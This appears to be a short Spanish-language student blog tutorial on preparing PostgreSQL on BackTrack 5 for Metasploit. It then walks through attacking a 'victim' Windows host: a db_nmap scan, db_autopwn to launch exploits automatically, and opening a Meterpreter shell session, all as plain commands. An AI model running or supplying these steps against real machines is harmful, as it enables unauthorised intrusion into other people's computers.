El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:

apt-get install postgresql libpq-dev

el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql.

Al finalizar la instalación conectamos con el postgresql y cambiamos el password

sudo su postgres -c psql

Aquí pones el password nuevo.

ALTER USER postgres WITH PASSWORD ‘password’ ;
después \q
sudo passwd -d postgres

sudo su postgres -c passwd con este se cambia el password

Esto es para conectarse del ruby al postgresql.

gem install pg

Ahora llamamos a metasploit

msfconsole
db_driver postgresql

y para conectar con la base de datos

db_connect postgres:”password”@127.0.0.1/metasploitdb

El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar
a la base de datos.

Ahora utilizamos nmap para ver las vulnerabilidades de la víctima.

db_nmap 192.168.1.10<——– el numero ip de la víctima  DB_NMAP es usado apartir de back track5 en adelante de xp sp 1.

Nmap escaneo los puertos e identifico el sistema operativo de la víctima.
Ahora procedemos con el ataque.

db_hosts
db_autopwn -t -p -e

AL terminar el autopwn muestra las posibles sesiones.
Para entrar a una de ellas

sessions -i 1 el numero es la sesión que fue elegida.

Aquí se puede ver como entra al shell de windows desde meterpreter.

Integrantes

  • Ronald Lloacana
  • Leandro Lopez
  • Fabian Zambrano

VIDEO DE ATAQUE DE AUTOPWN